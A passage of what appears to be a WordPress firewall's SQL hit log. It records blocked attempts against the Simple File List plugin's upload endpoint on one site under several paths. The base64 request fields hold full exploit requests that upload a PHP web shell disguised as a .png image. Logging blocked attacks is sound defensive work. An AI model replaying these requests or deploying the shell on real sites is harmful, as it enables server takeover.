(PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L2RlbW8vd3AtY29udGVudC9wbHVnaW5zL3NpbXBsZS1maWxlLWxpc3QvZWUtdXBsb2FkLWVuZ2luZS5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvZGVtby93cC1jb250ZW50L3BsdWdpbnMvc2ltcGxlLWZpbGUtbGlzdC9lZS11cGxvYWQtZW5naW5lLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTBfMTVfNCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzgxLjAuNDA0NC4xMjkgU2FmYXJpLzUzNy4zNgpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTUyMDUwZGRiZDI2NzhkMTIwNTVjZjk5OGU2NWJlNGJlCkNvbnRlbnQtTGVuZ3RoOiA5OTIKCi0tNTIwNTBkZGJkMjY3OGQxMjA1NWNmOTk4ZTY1YmU0YmUKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9JRCIKCjEKLS01MjA1MGRkYmQyNjc4ZDEyMDU1Y2Y5OThlNjViZTRiZQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX1Rva2VuIgoKYmEyODgyNTI2MjlhNTM5OTc1OWI2ZmRlMWUyMDViYzIKLS01MjA1MGRkYmQyNjc4ZDEyMDU1Y2Y5OThlNjViZTRiZQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX0ZpbGVVcGxvYWREaXIiCgovd3AtY29udGVudC91cGxvYWRzL3NpbXBsZS1maWxlLWxpc3QvCi0tNTIwNTBkZGJkMjY3OGQxMjA1NWNmOTk4ZTY1YmU0YmUKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9UaW1lc3RhbXAiCgoxNTg3MjU4ODg1Ci0tNTIwNTBkZGJkMjY3OGQxMjA1NWNmOTk4ZTY1YmU0YmUKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9Ind3cXRwd3B2b3EucG5nIgpDb250ZW50LVR5cGU6IGltYWdlL3BuZwpFeHBpcmVzOiAwCgo8P3BocCBlY2hvICJNb2hhbWVkWE8tU3AzY3RyYSI7IGVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsgZWNobyAiPGZvcm0gbWV0aG9kPSdwb3N0JyBlbmN0eXBlPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz4gPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J3piJz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPjwvZm9ybT4iOyBpZigkX1BPU1RbJ3VwbG9hZCddKSB7IGlmKEBjb3B5KCRfRklMRVNbJ3piJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ3piJ11bJ25hbWUnXSkpIHsgZWNobyAiZVhwbG9pdGluZyBEb25lIjsgfSBlbHNlIHsgZWNobyAiRmFpbGVkIHRvIFVwbG9hZC4iOyB9IH0gPz4KLS01MjA1MGRkYmQyNjc4ZDEyMDU1Y2Y5OThlNjViZTRiZS0tCg==\"}'),(175068,1604366298.637413,1604366297.364200,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/backup/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L2JhY2t1cC93cC1jb250ZW50L3BsdWdpbnMvc2ltcGxlLWZpbGUtbGlzdC9lZS11cGxvYWQtZW5naW5lLnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvYmFja3VwL3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L2VlLXVwbG9hZC1lbmdpbmUucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV80KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODEuMC40MDQ0LjEyOSBTYWZhcmkvNTM3LjM2CkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9ZjA1MzMyMjA2MTgwMzE2NzI0MTM3NDkxZGI2MWJlNjMKQ29udGVudC1MZW5ndGg6IDk5MgoKLS1mMDUzMzIyMDYxODAzMTY3MjQxMzc0OTFkYjYxYmU2MwpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX0lEIgoKMQotLWYwNTMzMjIwNjE4MDMxNjcyNDEzNzQ5MWRiNjFiZTYzCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfVG9rZW4iCgpiYTI4ODI1MjYyOWE1Mzk5NzU5YjZmZGUxZTIwNWJjMgotLWYwNTMzMjIwNjE4MDMxNjcyNDEzNzQ5MWRiNjFiZTYzCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfRmlsZVVwbG9hZERpciIKCi93cC1jb250ZW50L3VwbG9hZHMvc2ltcGxlLWZpbGUtbGlzdC8KLS1mMDUzMzIyMDYxODAzMTY3MjQxMzc0OTFkYjYxYmU2MwpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX1RpbWVzdGFtcCIKCjE1ODcyNTg4ODUKLS1mMDUzMzIyMDYxODAzMTY3MjQxMzc0OTFkYjYxYmU2MwpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0iZGFsZnNkamZwYy5wbmciCkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nCkV4cGlyZXM6IDAKCjw\\/cGhwIGVjaG8gIk1vaGFtZWRYTy1TcDNjdHJhIjsgZWNobyAiPGJyPiIucGhwX3VuYW1lKCkuIjxicj4iOyBlY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPiA8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0nemInPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3VwbG9hZCcgdmFsdWU9J3VwbG9hZCc+PC9mb3JtPiI7IGlmKCRfUE9TVFsndXBsb2FkJ10pIHsgaWYoQGNvcHkoJF9GSUxFU1snemInXVsndG1wX25hbWUnXSwgJF9GSUxFU1snemInXVsnbmFtZSddKSkgeyBlY2hvICJlWHBsb2l0aW5nIERvbmUiOyB9IGVsc2UgeyBlY2hvICJGYWlsZWQgdG8gVXBsb2FkLiI7IH0gfSA\\/PgotLWYwNTMzMjIwNjE4MDMxNjcyNDEzNzQ5MWRiNjFiZTYzLS0K\"}'),(175071,1604366291.750051,1604366290.639200,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/new/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L25ldy93cC1jb250ZW50L3BsdWdpbnMvc2ltcGxlLWZpbGUtbGlzdC9lZS11cGxvYWQtZW5naW5lLnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvbmV3L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L2VlLXVwbG9hZC1lbmdpbmUucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV80KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODEuMC40MDQ0LjEyOSBTYWZhcmkvNTM3LjM2CkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9MWNmN2U3YTFiMjg2NDNlZjRhNzlkMTE5MDE0YmY4YWYKQ29udGVudC1MZW5ndGg6IDk5MgoKLS0xY2Y3ZTdhMWIyODY0M2VmNGE3OWQxMTkwMTRiZjhhZgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX0lEIgoKMQotLTFjZjdlN2ExYjI4NjQzZWY0YTc5ZDExOTAxNGJmOGFmCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfVG9rZW4iCgpiYTI4ODI1MjYyOWE1Mzk5NzU5YjZmZGUxZTIwNWJjMgotLTFjZjdlN2ExYjI4NjQzZWY0YTc5ZDExOTAxNGJmOGFmCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfRmlsZVVwbG9hZERpciIKCi93cC1jb250ZW50L3VwbG9hZHMvc2ltcGxlLWZpbGUtbGlzdC8KLS0xY2Y3ZTdhMWIyODY0M2VmNGE3OWQxMTkwMTRiZjhhZgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX1RpbWVzdGFtcCIKCjE1ODcyNTg4ODUKLS0xY2Y3ZTdhMWIyODY0M2VmNGE3OWQxMTkwMTRiZjhhZgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0icG1xeGVjaWdndC5wbmciCkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nCkV4cGlyZXM6IDAKCjw\\/cGhwIGVjaG8gIk1vaGFtZWRYTy1TcDNjdHJhIjsgZWNobyAiPGJyPiIucGhwX3VuYW1lKCkuIjxicj4iOyBlY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPiA8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0nemInPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3VwbG9hZCcgdmFsdWU9J3VwbG9hZCc+PC9mb3JtPiI7IGlmKCRfUE9TVFsndXBsb2FkJ10pIHsgaWYoQGNvcHkoJF9GSUxFU1snemInXVsndG1wX25hbWUnXSwgJF9GSUxFU1snemInXVsnbmFtZSddKSkgeyBlY2hvICJlWHBsb2l0aW5nIERvbmUiOyB9IGVsc2UgeyBlY2hvICJGYWlsZWQgdG8gVXBsb2FkLiI7IH0gfSA\\/PgotLTFjZjdlN2ExYjI4NjQzZWY0YTc5ZDExOTAxNGJmOGFmLS0K\"}'),(175072,1604366289.712877,1604366288.531100,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/blog/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L2Jsb2cvd3AtY29udGVudC9wbHVnaW5zL3NpbXBsZS1maWxlLWxpc3QvZWUtdXBsb2FkLWVuZ2luZS5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvYmxvZy93cC1jb250ZW50L3BsdWdpbnMvc2ltcGxlLWZpbGUtbGlzdC9lZS11cGxvYWQtZW5naW5lLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTBfMTVfNCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzgxLjAuNDA0NC4xMjkgU2FmYXJpLzUzNy4zNgpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTNhODViM2U1MDZkN2M5ZWI2NjUwNzJmNjAyNmVlZGI3CkNvbnRlbnQtTGVuZ3RoOiA5OTIKCi0tM2E4NWIzZTUwNmQ3YzllYjY2NTA3MmY2MDI2ZWVkYjcKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9JRCIKCjEKLS0zYTg1YjNlNTA2ZDdjOWViNjY1MDcyZjYwMjZlZWRiNwpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX1Rva2VuIgoKYmEyODgyNTI2MjlhNTM5OTc1OWI2ZmRlMWUyMDViYzIKLS0zYTg1YjNlNTA2ZDdjOWViNjY1MDcyZjYwMjZlZWRiNwpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX0ZpbGVVcGxvYWREaXIiCgovd3AtY29udGVudC91cGxvYWRzL3NpbXBsZS1maWxlLWxpc3QvCi0tM2E4NWIzZTUwNmQ3YzllYjY2NTA3MmY2MDI2ZWVkYjcKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9UaW1lc3RhbXAiCgoxNTg3MjU4ODg1Ci0tM2E4NWIzZTUwNmQ3YzllYjY2NTA3MmY2MDI2ZWVkYjcKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9InNpbmJwbXp1Y2IucG5nIgpDb250ZW50LVR5cGU6IGltYWdlL3BuZwpFeHBpcmVzOiAwCgo8P3BocCBlY2hvICJNb2hhbWVkWE8tU3AzY3RyYSI7IGVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsgZWNobyAiPGZvcm0gbWV0aG9kPSdwb3N0JyBlbmN0eXBlPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz4gPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J3piJz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPjwvZm9ybT4iOyBpZigkX1BPU1RbJ3VwbG9hZCddKSB7IGlmKEBjb3B5KCRfRklMRVNbJ3piJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ3piJ11bJ25hbWUnXSkpIHsgZWNobyAiZVhwbG9pdGluZyBEb25lIjsgfSBlbHNlIHsgZWNobyAiRmFpbGVkIHRvIFVwbG9hZC4iOyB9IH0gPz4KLS0zYTg1YjNlNTA2ZDdjOWViNjY1MDcyZjYwMjZlZWRiNy0tCg==\"}'),(175073,1604366287.536822,1604366286.474600,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/wordpress/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dvcmRwcmVzcy93cC1jb250ZW50L3BsdWdpbnMvc2ltcGxlLWZpbGUtbGlzdC9lZS11cGxvYWQtZW5naW5lLnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd29yZHByZXNzL3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L2VlLXVwbG9hZC1lbmdpbmUucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV80KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODEuMC40MDQ0LjEyOSBTYWZhcmkvNTM3LjM2CkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9MmM5M2YxYjBhZjE2NWVjNjE3MTg1ZDRlOWQxZDcxYWQKQ29udGVudC1MZW5ndGg6IDk5MgoKLS0yYzkzZjFiMGFmMTY1ZWM2MTcxODVkNGU5ZDFkNzFhZApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX0lEIgoKMQotLTJjOTNmMWIwYWYxNjVlYzYxNzE4NWQ0ZTlkMWQ3MWFkCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfVG9rZW4iCgpiYTI4ODI1MjYyOWE1Mzk5NzU5YjZmZGUxZTIwNWJjMgotLTJjOTNmMWIwYWYxNjVlYzYxNzE4NWQ0ZTlkMWQ3MWFkCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfRmlsZVVwbG9hZERpciIKCi93cC1jb250ZW50L3VwbG9hZHMvc2ltcGxlLWZpbGUtbGlzdC8KLS0yYzkzZjFiMGFmMTY1ZWM2MTcxODVkNGU5ZDFkNzFhZApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImVlU0ZMX1RpbWVzdGFtcCIKCjE1ODcyNTg4ODUKLS0yYzkzZjFiMGFmMTY1ZWM2MTcxODVkNGU5ZDFkNzFhZApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0ibmN4cXJuanFpeC5wbmciCkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nCkV4cGlyZXM6IDAKCjw\\/cGhwIGVjaG8gIk1vaGFtZWRYTy1TcDNjdHJhIjsgZWNobyAiPGJyPiIucGhwX3VuYW1lKCkuIjxicj4iOyBlY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPiA8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0nemInPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3VwbG9hZCcgdmFsdWU9J3VwbG9hZCc+PC9mb3JtPiI7IGlmKCRfUE9TVFsndXBsb2FkJ10pIHsgaWYoQGNvcHkoJF9GSUxFU1snemInXVsndG1wX25hbWUnXSwgJF9GSUxFU1snemInXVsnbmFtZSddKSkgeyBlY2hvICJlWHBsb2l0aW5nIERvbmUiOyB9IGVsc2UgeyBlY2hvICJGYWlsZWQgdG8gVXBsb2FkLiI7IH0gfSA\\/PgotLTJjOTNmMWIwYWYxNjVlYzYxNzE4NWQ0ZTlkMWQ3MWFkLS0K\"}'),(175074,1604366285.308546,1604366284.033000,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/wp/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwL3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L2VlLXVwbG9hZC1lbmdpbmUucGhw\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3Avd3AtY29udGVudC9wbHVnaW5zL3NpbXBsZS1maWxlLWxpc3QvZWUtdXBsb2FkLWVuZ2luZS5waHAgSFRUUC8xLjEKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogYXNoYnlyZXNvcnQuY29tClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzE1XzQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQwNDQuMTI5IFNhZmFyaS81MzcuMzYKQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT01OTUwMmIyYzAzMTVmOTFkMzk0ODI5MGNmOTU0YmZiZQpDb250ZW50LUxlbmd0aDogOTkyCgotLTU5NTAyYjJjMDMxNWY5MWQzOTQ4MjkwY2Y5NTRiZmJlCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfSUQiCgoxCi0tNTk1MDJiMmMwMzE1ZjkxZDM5NDgyOTBjZjk1NGJmYmUKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9Ub2tlbiIKCmJhMjg4MjUyNjI5YTUzOTk3NTliNmZkZTFlMjA1YmMyCi0tNTk1MDJiMmMwMzE1ZjkxZDM5NDgyOTBjZjk1NGJmYmUKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9GaWxlVXBsb2FkRGlyIgoKL3dwLWNvbnRlbnQvdXBsb2Fkcy9zaW1wbGUtZmlsZS1saXN0LwotLTU5NTAyYjJjMDMxNWY5MWQzOTQ4MjkwY2Y5NTRiZmJlCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfVGltZXN0YW1wIgoKMTU4NzI1ODg4NQotLTU5NTAyYjJjMDMxNWY5MWQzOTQ4MjkwY2Y5NTRiZmJlCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJ4aGtydW5raGt4LnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKRXhwaXJlczogMAoKPD9waHAgZWNobyAiTW9oYW1lZFhPLVNwM2N0cmEiOyBlY2hvICI8YnI+Ii5waHBfdW5hbWUoKS4iPGJyPiI7IGVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+IDxpbnB1dCB0eXBlPSdmaWxlJyBuYW1lPSd6Yic+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0ndXBsb2FkJyB2YWx1ZT0ndXBsb2FkJz48L2Zvcm0+IjsgaWYoJF9QT1NUWyd1cGxvYWQnXSkgeyBpZihAY29weSgkX0ZJTEVTWyd6YiddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWyd6YiddWyduYW1lJ10pKSB7IGVjaG8gImVYcGxvaXRpbmcgRG9uZSI7IH0gZWxzZSB7IGVjaG8gIkZhaWxlZCB0byBVcGxvYWQuIjsgfSB9ID8+Ci0tNTk1MDJiMmMwMzE1ZjkxZDM5NDgyOTBjZjk1NGJmYmUtLQo=\"}'),(175075,1604366282.610839,1604366281.296000,'\0\0\0\0\0\0\0\0\0\03[E',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/simple-file-list/ee-upload-engine.php',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmlsZS1saXN0L2VlLXVwbG9hZC1lbmdpbmUucGhw\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3NpbXBsZS1maWxlLWxpc3QvZWUtdXBsb2FkLWVuZ2luZS5waHAgSFRUUC8xLjEKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogYXNoYnlyZXNvcnQuY29tClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzE1XzQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQwNDQuMTI5IFNhZmFyaS81MzcuMzYKQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT1hMzhjM2YyODA1NDAwODQ1Y2JjNzg2YjViNTM3NmJlYwpDb250ZW50LUxlbmd0aDogOTkyCgotLWEzOGMzZjI4MDU0MDA4NDVjYmM3ODZiNWI1Mzc2YmVjCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfSUQiCgoxCi0tYTM4YzNmMjgwNTQwMDg0NWNiYzc4NmI1YjUzNzZiZWMKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9Ub2tlbiIKCmJhMjg4MjUyNjI5YTUzOTk3NTliNmZkZTFlMjA1YmMyCi0tYTM4YzNmMjgwNTQwMDg0NWNiYzc4NmI1YjUzNzZiZWMKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJlZVNGTF9GaWxlVXBsb2FkRGlyIgoKL3dwLWNvbnRlbnQvdXBsb2Fkcy9zaW1wbGUtZmlsZS1saXN0LwotLWEzOGMzZjI4MDU0MDA4NDVjYmM3ODZiNWI1Mzc2YmVjCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZWVTRkxfVGltZXN0YW1wIgoKMTU4NzI1ODg4NQotLWEzOGMzZjI4MDU0MDA4NDVjYmM3ODZiNWI1Mzc2YmVjCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJkY3dydWV3eWljLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKRXhwaXJlczogMAoKPD9waHAgZWNobyAiTW9oYW1lZFhPLVNwM2N0cmEiOyBlY2hvICI8YnI+Ii5waHBfdW5hbWUoKS4iPGJyPiI7IGVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+IDxpbnB1dCB0eXBlPSdmaWxlJyBuYW1lPSd6Yic+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0ndXBsb2FkJyB2YWx1ZT0ndXBsb2FkJz48L2Zvcm0+IjsgaWYoJF9QT1NUWyd1cGxvYWQnXSkgeyBpZihAY29weSgkX0ZJTEVTWyd6YiddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWyd6YiddWyduYW1lJ10pKSB7IGVjaG8gImVYcGxvaXRpbmcgRG9uZSI7IH0gZWxzZSB7IGVjaG8gIkZhaWxlZCB0byBVcGxv